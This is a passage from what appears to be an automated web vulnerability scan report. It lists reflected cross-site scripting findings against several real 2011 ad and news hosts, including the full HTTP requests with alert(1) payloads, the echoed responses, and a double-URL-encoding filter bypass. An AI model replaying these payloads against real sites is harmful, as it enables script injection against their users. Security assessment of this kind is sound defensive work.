y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2dcffa<script>alert(1)</script>16a4cf57524", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
|
4.70. http://b.scorecardresearch.com/beacon.js [c4 parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b.scorecardresearch.com |
| Path: |
/beacon.js |
Issue detail
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload d68d4<script>alert(1)</script>a87e6bee52c was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=d68d4<script>alert(1)</script>a87e6bee52c&c5=&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633
|
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:06 GMT
Date: Sat, 17 Sep 2011 00:52:06 GMT
Content-Length: 1235
Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"d68d4<script>alert(1)</script>a87e6bee52c", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
|
4.71. http://b.scorecardresearch.com/beacon.js [c5 parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b.scorecardresearch.com |
| Path: |
/beacon.js |
Issue detail
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload e7599<script>alert(1)</script>52183d27ea7 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=e7599<script>alert(1)</script>52183d27ea7&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633
|
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:07 GMT
Date: Sat, 17 Sep 2011 00:52:07 GMT
Content-Length: 1235
Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"e7599<script>alert(1)</script>52183d27ea7", c6:"", c10:"", c15:"", c16:"", r:""});
|
4.72. http://b.scorecardresearch.com/beacon.js [c6 parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b.scorecardresearch.com |
| Path: |
/beacon.js |
Issue detail
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 4342b<script>alert(1)</script>a0dd5801e26 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=4342b<script>alert(1)</script>a0dd5801e26&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633
|
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:08 GMT
Date: Sat, 17 Sep 2011 00:52:08 GMT
Content-Length: 1235
Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"4342b<script>alert(1)</script>a0dd5801e26", c10:"", c15:"", c16:"", r:""});
|
4.73. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b3.mookie1.com |
| Path: |
/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c73"><script>alert(1)</script>e1b769851e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATTf3c73"><script>alert(1)</script>e1b769851e7/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:41:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 380
Content-Type: text/html
<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_ATTf3c73"><script>alert(1)</script>e1b769851e7/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]/2021264515/Bottom3/default/empty.gif/4d686437616b357a2b73594141673869?x" target="_top">
...[SNIP]...
|
4.74. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 3]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b3.mookie1.com |
| Path: |
/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 335ab"><script>alert(1)</script>facc901f053 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT/LP335ab"><script>alert(1)</script>facc901f053/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:41:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 463
Content-Type: text/html
<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_ATT/LP335ab"><script>alert(1)</script>facc901f053/cntacp_22UverseLPtest_LP_1_new/1[timestamp]/L9/1785929992/Bottom3/USNetwork/TRACK_Default/TRACK_Default_1x1pixel-.gif/4d686437616b357a2b74514141672b75?x" target="_blank">
...[SNIP]...
|
4.75. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 4]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b3.mookie1.com |
| Path: |
/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 |
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32bc8"><script>alert(1)</script>895c80335e5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new32bc8"><script>alert(1)</script>895c80335e5/1[timestamp]@Bottom3? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:41:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 463
Content-Type: text/html
<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new32bc8"><script>alert(1)</script>895c80335e5/1[timestamp]/L9/1578951643/Bottom3/USNetwork/TRACK_Default/TRACK_Default_1x1pixel-.gif/4d686437616b357a2b754941424d6f62?x" target="_blank">
...[SNIP]...
|
4.76. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 5]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b3.mookie1.com |
| Path: |
/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 |
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71dff"><script>alert(1)</script>b41d32a101b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom371dff"><script>alert(1)</script>b41d32a101b? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:42:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 372
Content-Type: text/html
<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]/1878794723/Bottom371dff"><script>alert(1)</script>b41d32a101b/default/empty.gif/4d686437616b357a2b764141426c786f?x" target="_top">
...[SNIP]...
|
4.77. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://bh.heraldinteractive.com |
| Path: |
/includes/processAds.bg |
Issue detail
The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9bf9</script><script>alert(1)</script>cc94f26ced5 was submitted in the companion parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottomb9bf9</script><script>alert(1)</script>cc94f26ced5&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:40 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2154
Connection: close
Content-Type: text/html
<style type="text/css">
/* div { top: 0px; } */
</style>
<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
ROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottomb9bf9</script><script>alert(1)</script>cc94f26ced5!Top">
...[SNIP]...
|
4.78. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://bh.heraldinteractive.com |
| Path: |
/includes/processAds.bg |
Issue detail
The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 431a4"><script>alert(1)</script>498ee9cb580 was submitted in the companion parameter. This input was echoed as 431a4\"><script>alert(1)</script>498ee9cb580 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom431a4"><script>alert(1)</script>498ee9cb580&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:36 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2118
Connection: close
Content-Type: text/html
<style type="text/css">
/* div { top: 0px; } */
</style>
<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom431a4\"><script>alert(1)</script>498ee9cb580!Top">
...[SNIP]...
|
4.79. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://bh.heraldinteractive.com |
| Path: |
/includes/processAds.bg |
Issue detail
The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cfbf%2527%253balert%25281%2529%252f%252f04fb34becb4 was submitted in the page parameter. This input was echoed as 4cfbf';alert(1)//04fb34becb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home4cfbf%2527%253balert%25281%2529%252f%252f04fb34becb4 HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:44 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2022
Connection: close
Content-Type: text/html
<style type="text/css">
/* div { top: 0px; } */
</style>
<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
'HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home4cfbf';alert(1)//04fb34becb4@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top">
...[SNIP]...
|
4.80. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://bh.heraldinteractive.com |
| Path: |
/includes/processAds.bg |
Issue detail
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97e2b"><script>alert(1)</script>d1318e1e89 was submitted in the page parameter. This input was echoed as 97e2b\"><script>alert(1)</script>d1318e1e89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home97e2b"><script>alert(1)</script>d1318e1e89 HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:43 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2112
Connection: close
Content-Type: text/html
<style type="text/css">
/* div { top: 0px; } */
</style>
<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home97e2b\"><script>alert(1)</script>d1318e1e89@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top">
...[SNIP]...
|
4.81. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://bh.heraldinteractive.com |
| Path: |
/includes/processAds.bg |
Issue detail
The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cb2a</script><script>alert(1)</script>60f4c826daf was submitted in the position parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/processAds.bg?position=Top2cb2a</script><script>alert(1)</script>60f4c826daf&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:29 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2149
Connection: close
Content-Type: text/html
<style type="text/css">
/* div { top: 0px; } */
</style>
<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
ING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top2cb2a</script><script>alert(1)</script>60f4c826daf">
...[SNIP]...
|
4.82. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://bh.heraldinteractive.com |
| Path: |
/includes/processAds.bg |
Issue detail
The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a42"><script>alert(1)</script>f1bf5dd16e2 was submitted in the position parameter. This input was echoed as 29a42\"><script>alert(1)</script>f1bf5dd16e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/processAds.bg?position=Top29a42"><script>alert(1)</script>f1bf5dd16e2&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:23 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2113
Connection: close
Content-Type: text/html
<style type="text/css">
/* div { top: 0px; } */
</style>
<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top29a42\"><script>alert(1)</script>f1bf5dd16e2">
...[SNIP]...
|
4.83. http://blekko.com/autocomplete [query parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://blekko.com |
| Path: |
/autocomplete |
Issue detail
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload a4d93<script>alert(1)</script>c705977927c was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /autocomplete?query=raa4d93<script>alert(1)</script>c705977927c HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=3
|
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:44:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=15
Cache-Control: max-age=43200
Expires: Sat, 17 Sep 2011 07:44:24 GMT
Vary: Accept-Encoding
Content-Length: 72
X-Blekko-PT: 93cfc820c49a41f46623c49ee1de1a1a
{"suggestions":[],"query":"raa4d93<script>alert(1)</script>c705977927c"} |
4.84. http://bostonherald.com/includes/processAds.bg [companion parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://bostonherald.com |
| Path: |
/includes/processAds.bg |
Issue detail
The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8eb5"><script>alert(1)</script>ac50390d5f8 was submitted in the companion parameter. This input was echoed as b8eb5\"><script>alert(1)</script>ac50390d5f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottomb8eb5"><script>alert(1)</script>ac50390d5f8&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
